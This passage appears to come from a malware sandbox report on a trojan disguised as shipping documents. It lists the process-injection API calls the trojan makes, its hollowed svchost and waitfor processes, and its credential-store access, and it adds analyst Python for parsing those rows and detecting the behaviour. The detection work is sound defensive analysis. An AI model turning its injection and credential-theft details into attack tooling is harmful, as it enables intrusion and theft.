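Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072D30 NtUnmapViewOfSection,2_2_03072D30
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072CF0 NtOpenProcess,2_2_03072CF0
Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C94340 NtSetContextThread,LdrInitializeThunk,5_2_04C94340
Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C92EE0 NtQueueApcThread,LdrInitializeThunk,5_2_04C92EE0
Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_04C92E30 NtWriteVirtualMemory,5_2_04C92E30
Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_02C88E00 NtCreateFile,5_2_02C88E00
Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_02C89060 NtDeleteFile,5_2_02C89060
Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B5E6A00_2_00B5E6A0
"""

# Row shape: "Source: <path>.exeCode function: <idx>_<n>_<addr8> <api>,<api>,<idx>_<n>_<addr8>".
# The API list may be empty, in which case the function id appears twice back to back.
ROW_RE = re.compile(
    r"^\s*Source:\s*(?P<proc>.+?\.exe)Code function:\s*"
    r"(?P<fn>\d+_\d+_[0-9A-Fa-f]{8})\s*(?P<apis>\S*?)(?P=fn)\s*$")

# Native call -> injection step it implements. Analyst-maintained table
# (assumption for this example, not taken from the report).
INJECTION_PRIMITIVES = {
    "NtOpenProcess": "open target process",
    "NtCreateProcessEx": "create target process (hollowing)",
    "NtAllocateVirtualMemory": "allocate memory in target",
    "NtWriteVirtualMemory": "write payload into target",
    "NtCreateSection": "create section for payload",
    "NtMapViewOfSection": "map section into target",
    "NtUnmapViewOfSection": "unmap original image (hollowing)",
    "NtProtectVirtualMemory": "make payload executable",
    "NtGetContextThread": "read target thread context",
    "NtSetContextThread": "redirect target thread (context hijack)",
    "NtQueueApcThread": "queue APC in target thread",
    "NtSuspendThread": "suspend target thread",
    "NtResumeThread": "resume target thread",
}


@dataclass(frozen=True)
class Row:
    process: str            # image basename, e.g. "svchost.exe"
    pid_index: int          # first field of the function id (report's process index)
    address: int            # function start address
    apis: tuple[str, ...]   # APIs the function calls, in listed order


def parse_rows(text: str) -> list[Row]:
    """Parse every well-formed report row; lines that do not match are skipped."""
    rows: list[Row] = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue
        idx, _, addr = m["fn"].split("_")
        apis = tuple(a for a in m["apis"].split(",") if a)
        rows.append(Row(m["proc"].rsplit("\\", 1)[-1], int(idx), int(addr, 16), apis))
    return rows


def nt_calls(row: Row) -> list[str]:
    return [a for a in row.apis if a.startswith("Nt")]


def injection_coverage(rows: list[Row]) -> dict[str, list[str]]:
    """Per process, the sorted injection primitives its listed functions call."""
    cov: dict[str, set[str]] = {}
    for r in rows:
        for api in nt_calls(r):
            if api in INJECTION_PRIMITIVES:
                cov.setdefault(r.process, set()).add(api)
    return {p: sorted(s) for p, s in cov.items()}


def stub_regions(rows: list[Row]) -> dict[str, dict[int, int]]:
    """Per process, how many Nt*-calling functions sit in each 64 KiB region.
    A dense cluster away from the process image is the shape a privately
    mapped copy of ntdll's syscall stubs takes."""
    regions: dict[str, dict[int, int]] = {}
    for r in rows:
        if nt_calls(r):
            base = r.address & ~0xFFFF
            per_proc = regions.setdefault(r.process, {})
            per_proc[base] = per_proc.get(base, 0) + 1
    return regions


def indirect_stubs(rows: list[Row]) -> dict[str, int]:
    """Per process, Nt* functions whose call list also names LdrInitializeThunk,
    the co-occurrence pattern the report shows for the clustered stubs."""
    out: dict[str, int] = {}
    for r in rows:
        if nt_calls(r) and "LdrInitializeThunk" in r.apis:
            out[r.process] = out.get(r.process, 0) + 1
    return out


if __name__ == "__main__":
    rows = parse_rows(SAMPLE_ROWS)
    for proc, prims in injection_coverage(rows).items():
        print(f"{proc}: {len(prims)}/{len(INJECTION_PRIMITIVES)} injection primitives")
        for p in prims:
            print(f"    {p:<24} {INJECTION_PRIMITIVES[p]}")
    for proc, regs in stub_regions(rows).items():
        for base, n in sorted(regs.items()):
            print(f"{proc}: {n} Nt* stub(s) in 0x{base:08X}-0x{base + 0xFFFF:08X}")
    print("stubs co-listed with LdrInitializeThunk:", indirect_stubs(rows))
```

Feeding the full row list from the report into `parse_rows` gives the complete picture; the constructed subset is enough to show the two results that matter for triage, namely that both hollowed processes hold every primitive needed for section-mapping, APC and thread-context injection, and that those primitives are concentrated in one region per process, which is where a hunter should dump memory from.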
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00BBA1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00BBA1EF
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00BA8310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00BA8310
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00BB51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00BB51BD
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B5E6A00_2_00B5E6A0
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B7D9750_2_00B7D975
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B721C50_2_00B721C5
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B862D20_2_00B862D2
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00BD03DA0_2_00BD03DA
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B8242E0_2_00B8242E
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B725FA0_2_00B725FA
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B666E10_2_00B666E1
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00BAE6160_2_00BAE616
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B8878F0_2_00B8878F
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00BB88890_2_00BB8889
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B688080_2_00B68808
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00BD08570_2_00BD0857
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B868440_2_00B86844
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B7CB210_2_00B7CB21
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B86DB60_2_00B86DB6
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B66F9E0_2_00B66F9E
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B630300_2_00B63030
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B731870_2_00B73187
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B7F1D90_2_00B7F1D9
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B512870_2_00B51287
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B714840_2_00B71484
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B655200_2_00B65520
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B776960_2_00B77696
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B657600_2_00B65760
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B719780_2_00B71978
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B89AB50_2_00B89AB5
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B5FCE00_2_00B5FCE0
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B7BDA60_2_00B7BDA6
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B71D900_2_00B71D90
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00BD7DDB0_2_00BD7DDB
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B63FE00_2_00B63FE0
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B5DF000_2_00B5DF00
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_009B36200_2_009B3620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004C85032_2_004C8503
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004B28102_2_004B2810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004BE0F72_2_004BE0F7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004BE1032_2_004BE103
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004B31D02_2_004B31D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004B12402_2_004B1240
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004DEBD32_2_004DEBD3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004B2C8A2_2_004B2C8A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004B2C902_2_004B2C90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004B24902_2_004B2490
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004B15092_2_004B1509
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004B15102_2_004B1510
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004BFDB32_2_004BFDB3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004C67132_2_004C6713
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004BFFD32_2_004BFFD3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004BDFA92_2_004BDFA9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004BDFB32_2_004BDFB3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FA3522_2_030FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F02_2_0304E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031003E62_2_031003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E02742_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe | Code functions:
    2_2_030C02C0, 2_2_03030100, 2_2_030DA118, 2_2_030C8158, 2_2_030F41A2, 2_2_031001AA, 2_2_030F81CC, 2_2_030D2000,
    2_2_03064750, 2_2_03040770, 2_2_0303C7C0, 2_2_0305C6E0, 2_2_03040535, 2_2_03100591, 2_2_030E4420, 2_2_030F2446,
    2_2_030EE4F6, 2_2_030FAB40, 2_2_030F6BD7, 2_2_0303EA80, 2_2_03056962, 2_2_030429A0, 2_2_0310A9A6, 2_2_0304A840,
    2_2_03042840, 2_2_030268B8, 2_2_0306E8F0, 2_2_03082F28, 2_2_03060F30, 2_2_030E2F30, 2_2_030B4F40, 2_2_030BEFA0,
    2_2_03032FC8, 2_2_0304CFE0, 2_2_030FEE26, 2_2_03040E59, 2_2_03052E90, 2_2_030FCE93, 2_2_030FEEDB, 2_2_0304AD00,
    2_2_030DCD1F, 2_2_03058DBF, 2_2_0303ADE0, 2_2_03040C00, 2_2_030E0CB5, 2_2_03030CF2, 2_2_030F132D, 2_2_0302D34C,
    2_2_0308739A, 2_2_030452A0, 2_2_0305B2C0, 2_2_030E12ED, 2_2_0307516C, 2_2_0302F172, 2_2_0310B16B, 2_2_0304B1B0,
    2_2_030EF0CC, 2_2_030470C0, 2_2_030F70E9, 2_2_030FF0E0, 2_2_030FF7B0, 2_2_03085630, 2_2_030F16CC, 2_2_030F7571,
    2_2_030DD5B0, 2_2_031095C3, 2_2_030FF43F, 2_2_03031460, 2_2_030FFB76, 2_2_0305FB80, 2_2_030B5BF0, 2_2_0307DBF9,
    2_2_030FFA49, 2_2_030F7A46, 2_2_030B3A6C, 2_2_030DDAAC, 2_2_03085AA0, 2_2_030E1AA3, 2_2_030EDAC6, 2_2_030D5910,
    2_2_03049950, 2_2_0305B950, 2_2_030AD800, 2_2_030438E0, 2_2_030FFF09, 2_2_03041F92, 2_2_030FFFB1, 2_2_03003FD2,
    2_2_03003FD5, 2_2_03049EB0, 2_2_03043D40, 2_2_030F1D5A, 2_2_030F7D73, 2_2_0305FDC0, 2_2_030B9C32, 2_2_030FFCF2
Source: C:\Windows\SysWOW64\waitfor.exe | Code functions:
    5_2_04D0E4F6, 5_2_04D12446, 5_2_04D04420, 5_2_04D20591, 5_2_04C60535, 5_2_04C7C6E0, 5_2_04C5C7C0, 5_2_04C84750,
    5_2_04C60770, 5_2_04CF2000, 5_2_04D181CC, 5_2_04D141A2, 5_2_04D201AA, 5_2_04CE8158, 5_2_04C50100, 5_2_04CFA118,
    5_2_04CE02C0, 5_2_04D00274, 5_2_04D203E6, 5_2_04C6E3F0, 5_2_04D1A352, 5_2_04C50CF2, 5_2_04D00CB5, 5_2_04C60C00,
    5_2_04C5ADE0, 5_2_04C78DBF, 5_2_04C6AD00, 5_2_04CFCD1F, 5_2_04D1EEDB, 5_2_04D1CE93, 5_2_04C72E90, 5_2_04C60E59,
    5_2_04D1EE26, 5_2_04C52FC8, 5_2_04C6CFE0, 5_2_04CDEFA0, 5_2_04CD4F40, 5_2_04D02F30, 5_2_04CA2F28, 5_2_04C80F30,
    5_2_04C8E8F0, 5_2_04C468B8, 5_2_04C62840, 5_2_04C6A840, 5_2_04C629A0, 5_2_04D2A9A6, 5_2_04C76962, 5_2_04C5EA80,
    5_2_04D16BD7, 5_2_04D1AB40, 5_2_04C51460, 5_2_04D1F43F, 5_2_04D295C3, 5_2_04CFD5B0, 5_2_04D17571, 5_2_04D116CC,
    5_2_04CA5630, 5_2_04D1F7B0, 5_2_04C670C0, 5_2_04D0F0CC, 5_2_04D1F0E0, 5_2_04D170E9, 5_2_04C6B1B0, 5_2_04C9516C,
    5_2_04C4F172, 5_2_04D2B16B, 5_2_04C7B2C0, 5_2_04D012ED, 5_2_04C652A0, 5_2_04CA739A, 5_2_04C4D34C, 5_2_04D1132D,
    5_2_04D1FCF2, 5_2_04CD9C32, 5_2_04C7FDC0, 5_2_04C63D40, 5_2_04D11D5A, 5_2_04D17D73, 5_2_04C69EB0, 5_2_04C23FD2,
    5_2_04C23FD5, 5_2_04C61F92, 5_2_04D1FFB1, 5_2_04D1FF09, 5_2_04C638E0, 5_2_04CCD800, 5_2_04C69950, 5_2_04C7B950,
    5_2_04CF5910, 5_2_04D0DAC6, 5_2_04CFDAAC, 5_2_04CA5AA0, 5_2_04D01AA3, 5_2_04D17A46, 5_2_04D1FA49, 5_2_04CD3A6C,
    5_2_04C9DBF9, 5_2_04CD5BF0, 5_2_04C7FB80, 5_2_04D1FB76, 5_2_02C71A20, 5_2_02C6CB50, 5_2_02C6AB26, 5_2_02C6AB30,
    5_2_02C6C930, 5_2_02C6AC80, 5_2_02C6AC74, 5_2_02C73290, 5_2_02C75080, 5_2_02C8B750, 5_2_04A1E464, 5_2_04A1E7FC,
    5_2_04A1E344, 5_2_04A1D8C8, 5_2_04A1E802
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 030BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03075130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 030AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0302B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03087E54 appears 111 times
Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe | Code function: String function: 00B70AE3 appears 70 times
Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe | Code function: String function: 00B78900 appears 42 times
Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe | Code function: String function: 00B57DE1 appears 35 times
Source: C:\Windows\SysWOW64\waitfor.exe | Code function: String function: 04CCEA12 appears 86 times
Source: C:\Windows\SysWOW64\waitfor.exe | Code function: String function: 04C4B970 appears 280 times
Source: C:\Windows\SysWOW64\waitfor.exe | Code function: String function: 04CDF290 appears 105 times
Source: C:\Windows\SysWOW64\waitfor.exe | Code function: String function: 04CA7E54 appears 111 times
Source: C:\Windows\SysWOW64\waitfor.exe | Code function: String function: 04C95130 appears 58 times
Source: SHIPPING DOCUMENTS_PDF.exe, 00000000.00000003.2030539371.00000000037FD000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs SHIPPING DOCUMENTS_PDF.exe
Source: SHIPPING DOCUMENTS_PDF.exe, 00000000.00000003.2030424759.0000000003653000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs SHIPPING DOCUMENTS_PDF.exe
Source: SHIPPING DOCUMENTS_PDF.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/3@17/12
Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe | Code function: 0_2_00BBA06A GetLastError,FormatMessageW
Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe | Code function: 0_2_00BA81CB AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe | Code function: 0_2_00BA87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe | Code function: 0_2_00BBB3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe | Code function: 0_2_00BCEE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe | Code function: 0_2_00BC83BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear
Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe | Code function: 0_2_00B54E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe | File created: C:\Users\user\AppData\Local\Temp\aut84AE.tmp
Source: SHIPPING DOCUMENTS_PDF.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: waitfor.exe, 00000005.00000002.4472625168.0000000002F53000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000003.2423088351.0000000002F31000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000003.2425297116.0000000002F80000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000003.2423088351.0000000002F53000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000003.2425297116.0000000002F53000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000003.2425106123.0000000002F5D000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4472625168.0000000002F80000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: SHIPPING DOCUMENTS_PDF.exe | ReversingLabs: Detection: 52%
Source: unknown | Process created: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe "C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe"
Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe"
Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe | Process created: C:\Windows\SysWOW64\waitfor.exe "C:\Windows\SysWOW64\waitfor.exe"
Source: C:\Windows\SysWOW64\waitfor.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe | Sections loaded:
    wsock32.dll, version.dll, winmm.dll, mpr.dll, wininet.dll, iphlpapi.dll, userenv.dll, uxtheme.dll,
    kernel.appcore.dll, windows.storage.dll, wldp.dll, ntmarta.dll
Source: C:\Windows\SysWOW64\waitfor.exe | Sections loaded:
    mpr.dll, version.dll, srvcli.dll, netutils.dll, sspicli.dll, wininet.dll, kernel.appcore.dll, uxtheme.dll,
    ieframe.dll, iertutil.dll, netapi32.dll, userenv.dll, winhttp.dll, wkscli.dll, windows.storage.dll, wldp.dll,
    profapi.dll, secur32.dll, mlang.dll, propsys.dll, winsqlite3.dll, vaultcli.dll, wintypes.dll, dpapi.dll,
    cryptbase.dll
Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe | Sections loaded:
    wininet.dll, mswsock.dll, dnsapi.dll, iphlpapi.dll, fwpuclnt.dll, rasadhlp.dll
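Added detection example (not part of the Joe Sandbox report and not the sample's code): the "Process created" and "Section loaded" rows above describe a chain that process telemetry can catch without any FormBook-specific signature. A SysWOW64 svchost.exe is started by an executable on the user's Desktop and still carries that executable's command line; a console utility (waitfor.exe) is started from a random-named Program Files (x86) directory and then launches Firefox; and the same waitfor.exe loads winsqlite3.dll, vaultcli.dll and dpapi.dll, the libraries needed to read SQLite browser databases, the Windows credential vault and DPAPI-protected blobs. The Python below runs four such rules over constructed process and image-load events modelled on those rows. The event layout, the "unknown" parent, the benign control events, the BROWSERS/CRED_DLLS sets and the SHELLS allowlist are assumptions made for this example.

```python
import ntpath
from typing import Dict, List, Set, Tuple

# Constructed telemetry modelled on the "Process created" and "Section loaded"
# rows of the report.  Paths are copied from those rows; the event layout, the
# "unknown" parent and the two benign control events are assumptions made for
# this example, not sandbox output.
EVENTS: List[Dict[str, str]] = [
    {"type": "process", "parent": "unknown",
     "image": r"C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe",
     "cmdline": r'"C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe"'},
    {"type": "process", "parent": r"C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe",
     "image": r"C:\Windows\SysWOW64\svchost.exe",
     "cmdline": r'"C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe"'},
    {"type": "process",
     "parent": r"C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe",
     "image": r"C:\Windows\SysWOW64\waitfor.exe",
     "cmdline": r'"C:\Windows\SysWOW64\waitfor.exe"'},
    {"type": "process", "parent": r"C:\Windows\SysWOW64\waitfor.exe",
     "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "cmdline": r'"C:\Program Files\Mozilla Firefox\Firefox.exe"'},
    {"type": "imageload", "image": r"C:\Windows\SysWOW64\waitfor.exe", "module": "winsqlite3.dll"},
    {"type": "imageload", "image": r"C:\Windows\SysWOW64\waitfor.exe", "module": "vaultcli.dll"},
    {"type": "imageload", "image": r"C:\Windows\SysWOW64\waitfor.exe", "module": "dpapi.dll"},
    # Benign controls (assumed): a genuine service host and a browser using DPAPI.
    {"type": "process", "parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs -p"},
    {"type": "imageload", "image": r"C:\Program Files\Mozilla Firefox\firefox.exe", "module": "dpapi.dll"},
]

BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe"}
# SQLite reader, credential-vault client and DPAPI: what a browser credential
# stealer loads; waitfor.exe has no business loading any of them.
CRED_DLLS = {"winsqlite3.dll", "vaultcli.dll", "dpapi.dll"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
SHELLS = {"cmd.exe", "powershell.exe"}  # system-dir parents allowed to open a browser


def _base(path: str) -> str:
    return ntpath.basename(path).lower()


def _in_system_dir(path: str) -> bool:
    return path.lower().startswith(SYSTEM_DIRS)


def _cmdline_image(cmdline: str) -> str:
    """Executable named by a Windows command line: quoted argv[0], else text up to the first space."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end != -1 else s[1:]
    return s.split(" ", 1)[0]


def evaluate(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Return (rule, offending image path) pairs in event order."""
    findings: List[Tuple[str, str]] = []
    cred_loaded: Dict[str, Set[str]] = {}  # image -> credential DLLs seen so far
    for ev in events:
        image = ev["image"]
        if ev["type"] == "process":
            parent = ev["parent"]
            # Rule 1: the command line names a different executable than the image
            # (the svchost.exe the sample injects into still carries the sample's command line).
            if _base(_cmdline_image(ev["cmdline"])) != _base(image):
                findings.append(("cmdline_image_mismatch", image))
            # Rule 2: svchost.exe started by anything other than services.exe.
            if _base(image) == "svchost.exe" and _base(parent) != "services.exe":
                findings.append(("svchost_unexpected_parent", image))
            # Rule 3: a console utility in System32/SysWOW64 launches a browser.
            if _base(image) in BROWSERS and _in_system_dir(parent) and _base(parent) not in SHELLS:
                findings.append(("system_utility_spawns_browser", parent))
        elif ev["type"] == "imageload":
            mod = ev["module"].lower()
            if mod in CRED_DLLS and _in_system_dir(image):
                seen = cred_loaded.setdefault(image, set())
                if mod not in seen:
                    seen.add(mod)
                    # Rule 4: fire once, when the full credential toolkit has been loaded.
                    if seen == CRED_DLLS:
                        findings.append(("system_utility_loads_credential_dlls", image))
    return findings


if __name__ == "__main__":
    for rule, path in evaluate(EVENTS):
        print(f"{rule:40} {path}")
```

On the constructed events the four rules fire once each, all on svchost.exe or waitfor.exe, and the two benign controls stay silent. The rules deliberately key on the system utilities rather than on the pNkvbgLNQpIoyz.exe parent: the "Binary string" rows below show that its image carries the sandbox's own FakeChrome PDB path, so it is a sandbox-supplied browser decoy rather than an artifact of the sample, and a random directory name under Program Files (x86) is not a stable indicator anyway. Rule 2 and the SHELLS allowlist need tuning to whatever legitimately launches svchost.exe and browsers in your own telemetry.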
Source: C:\Windows\SysWOW64\waitfor.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
Source: C:\Windows\SysWOW64\waitfor.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: SHIPPING DOCUMENTS_PDF.exe | Static file information: File size 1188352 > 1048576
Source: SHIPPING DOCUMENTS_PDF.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SHIPPING DOCUMENTS_PDF.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SHIPPING DOCUMENTS_PDF.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SHIPPING DOCUMENTS_PDF.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SHIPPING DOCUMENTS_PDF.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SHIPPING DOCUMENTS_PDF.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: SHIPPING DOCUMENTS_PDF.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
